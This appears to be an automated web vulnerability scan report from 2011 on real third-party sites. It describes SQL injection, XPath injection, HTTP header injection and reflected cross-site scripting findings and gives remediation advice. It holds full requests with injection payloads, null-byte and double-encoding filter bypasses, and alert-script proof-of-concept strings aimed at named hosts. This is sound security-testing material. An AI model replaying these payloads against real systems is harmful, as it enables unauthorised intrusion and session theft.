SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights from occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The PluID parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the PluID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The idd parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the idd parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
The num_ads parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the num_ads parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 03 May 2011 00:09:18 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 20506
{
var google_ads = new Array(); var google_ad; var google_radlinks = new Array(); var google_radlink; var google_info = new Object(); google_ad = new Object(); google_ad.n = 1; google_ad.type = "te ...[SNIP]... &adurl=http://www.grammarly.com/%3Fq%3Dgrammar"; google_ad.visible_url = "www.Grammarly.com/Grammar_Checker"; google_ad.line1 = "Instant Grammar Checker"; google_ad.line2 = "Correct All Grammar Errors And"; google_ad.line3 = "Enhance Your Writing. Try Now!"; google_ad.regionname = ""; google_ads[18] = google_ad; google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x26q\x3dhttps://ww ...[SNIP]...
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 03 May 2011 00:09:19 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 754
{
var google_ads = new Array(); var google_ad; var google_radlinks = new Array(); var google_radlink; var google_info = new Object(); google_info.feedback_url = "http://www.google.com/url?ct\x3dabg\x ...[SNIP]...
The clicktag parameter appears to be vulnerable to SQL injection attacks. The payloads 13256991'%20or%201%3d1--%20 and 13256991'%20or%201%3d2--%20 were each submitted in the clicktag parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]13256991'%20or%201%3d1--%20&rnd=[RANDOM] HTTP/1.1 Host: ieo.solution.weborama.fr Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/?refresh_ce User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1 (redirected)
HTTP/1.1 200 OK Date: Mon, 02 May 2011 23:05:30 GMT Server: Apache P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM" Pragma: no-cache Cache-Control: no-cache Connection: close Content-Type: application/x-javascript Content-Length: 3388
The product_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the product_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the product_id request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 500 The request has exceeded the allowable time limit Tag: cfoutput Content-Type: text/html;charset=utf-8 Server: Microsoft-IIS/7.0 server-error: true Date: Mon, 02 May 2011 22:58:38 GMT Content-Length: 10083
<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head> <title>Unexpected Error</title> <style type="tex ...[SNIP]... <pre>coldfusion.runtime.RequestTimedOutException: The request has exceeded the allowable time limit Tag: cfoutput at coldfusion.tagext.io.OutputTag.doStartTag(OutputTag.java:149) at cfonError2ecfm215532197$funcONERROR.runFunction(D:\wwwroot\elsevi ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /web%00'/notizie/photogallery/hp_photo_index.xml?d=1304392412995 HTTP/1.1 Host: www.ansa.it Proxy-Connection: keep-alive Referer: http://www.ansa.it/web/video/visual.swf Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Mon, 02 May 2011 22:15:00 GMT Content-type: text/html Content-Length: 128891
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang ...[SNIP]... <ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions"> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /web/notizie%00'/photogallery/hp_photo_index.xml?d=1304392412995 HTTP/1.1 Host: www.ansa.it Proxy-Connection: keep-alive Referer: http://www.ansa.it/web/video/visual.swf Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 404 Not found Server: Sun-Java-System-Web-Server/7.0 Date: Mon, 02 May 2011 22:15:06 GMT Content-Length: 43626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it"> <head> <meta http-equiv="Content ...[SNIP]... <ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request
GET /web/notizie/photogallery%00'/hp_photo_index.xml?d=1304392412995 HTTP/1.1 Host: www.ansa.it Proxy-Connection: keep-alive Referer: http://www.ansa.it/web/video/visual.swf Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 404 Not found Server: Sun-Java-System-Web-Server/7.0 Date: Mon, 02 May 2011 22:15:11 GMT Content-Length: 43626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it"> <head> <meta http-equiv="Content ...[SNIP]... <ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions"> ...[SNIP]...
3. HTTP header injection
There are 5 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
3.1. http://a.tribalfusion.com/h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload eb2c3%0d%0ac4e6f30a34e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/?eb2c3%0d%0ac4e6f30a34e=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID= ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload c8672%0d%0a22b17c10325 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /c/c8672%0d%0a22b17c10325/U6PZANHGRBHQFBIDRUUZ3E/33IKJE45JFAHDG4ETT36VB HTTP/1.1 Host: d.adroll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __adroll=9de52dcbec4c3cf1dab71495bd2ad935;
Response
HTTP/1.1 302 Moved Temporarily Server: nginx/0.7.67 Date: Mon, 02 May 2011 22:24:02 GMT Connection: close Set-Cookie: __adroll=9de52dcbec4c3cf1dab71495bd2ad935; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/ Pragma: no-cache P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV' Location: http://a.adroll.com/r/c8672 22b17c10325/U6PZANHGRBHQFBIDRUUZ3E/0d742ed1925a733b1b33d771e0b2e1a8.js: Content-Length: 0 Cache-Control: no-store, no-cache, must-revalidate
The value of REST URL parameter 2 is copied into the Location response header. The payload 76bc1%0d%0ad390fd98756 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /activity/76bc1%0d%0ad390fd98756 HTTP/1.1 Host: go.techtarget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; ugcCltHeight=; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=UNASSIGNED; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783;
Response
HTTP/1.1 302 Found Server: Resin/3.1.8 Location: http://go.techtarget.com//clicktrack-r/activity/76bc1 d390fd98756 Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: close Date: Mon, 02 May 2011 22:26:01 GMT
The URL has moved <a href="http://go.techtarget.com//clicktrack-r/activity/76bc1 d390fd98756">here</a>
The value of the c request parameter is copied into the Set-Cookie response header. The payload a286d%0d%0a1880160ebae was submitted in the c parameter. This caused a response containing an injected HTTP header.
The value of the dv request parameter is copied into the OAS_DE_ERROR response header. The payload cc980%0d%0a52522401ba6 was submitted in the dv parameter. This caused a response containing an injected HTTP header.
HTTP/1.1 500 Internal Server Error Date: Mon, 02 May 2011 22:16:56 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" OAS_DE_ERROR: error converting 'cc980 52522401ba6' value to numeric value [i]. request to 'mfr.247realmedia.com' for '/RealMedia/ads/adstream.cap/123', referer 'http://www.telecomitalia.it/', handler 'cap-add' Cteonnt-Length: 620 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: NSC_n1efm_qppm_iuuq=ffffffff09097b8345525d5f4f58455e445a4a423660;path=/;httponly Cache-Control: private Content-Length: 620
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>500 Internal Server Error</title> </head><body> <h1>Internal Server Error</h1> <p>The server encountered an internal error or mis ...[SNIP]...
4. Cross-site scripting (reflected)
There are 56 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f0413<script>alert(1)</script>b1e8f5dc312 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /json/2011-03-01/applications/mediaslot/624BF84E5DF10228E1C8?callback=zanox.cb.ZX624BF84E5DF10228E1C80f0413<script>alert(1)</script>b1e8f5dc312 HTTP/1.1 Host: api.zanox.com Proxy-Connection: keep-alive Referer: http://www.telecomitalia.it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:14:05 GMT Server: Apache-Coyote/1.1 Content-Type: application/javascript;charset=UTF-8 Connection: close Content-Length: 18973
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007a6a5"><script>alert(1)</script>3089dd44574 was submitted in the REST URL parameter 1. This input was echoed as 7a6a5"><script>alert(1)</script>3089dd44574 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%007a6a5"><script>alert(1)</script>3089dd44574 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cd550 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97a45"><script>alert(1)</script>4f4293691b6 was submitted in the cd550 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
4.4. http://expertsystem.net/clienti_dettaglio.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://expertsystem.net
Path: /clienti_dettaglio.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd550"><script>alert(1)</script>50bcce83c95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /clienti_dettaglio.asp?cd550"><script>alert(1)</script>50bcce83c95=1 HTTP/1.1 Host: expertsystem.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 02 May 2011 22:20:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 9055 Content-Type: text/html Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.5. http://expertsystem.net/clienti_home.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://expertsystem.net
Path: /clienti_home.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53cc3"><script>alert(1)</script>261686493f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /clienti_home.asp?53cc3"><script>alert(1)</script>261686493f3=1 HTTP/1.1 Host: expertsystem.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 02 May 2011 22:20:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 9045 Content-Type: text/html Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.6. http://expertsystem.net/demo_prodotti.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://expertsystem.net
Path: /demo_prodotti.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26cf"><script>alert(1)</script>2636baa7cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /demo_prodotti.asp?b26cf"><script>alert(1)</script>2636baa7cd0=1 HTTP/1.1 Host: expertsystem.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 02 May 2011 22:20:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23399 Content-Type: text/html Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.7. http://expertsystem.net/page.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://expertsystem.net
Path: /page.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 655a1"><script>alert(1)</script>a91230d7791 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page.asp?655a1"><script>alert(1)</script>a91230d7791=1 HTTP/1.1 Host: expertsystem.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 02 May 2011 22:20:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 9029 Content-Type: text/html Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.8. http://expertsystem.net/vetrinanews.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://expertsystem.net
Path: /vetrinanews.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f5da"><script>alert(1)</script>e77b82b7423 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
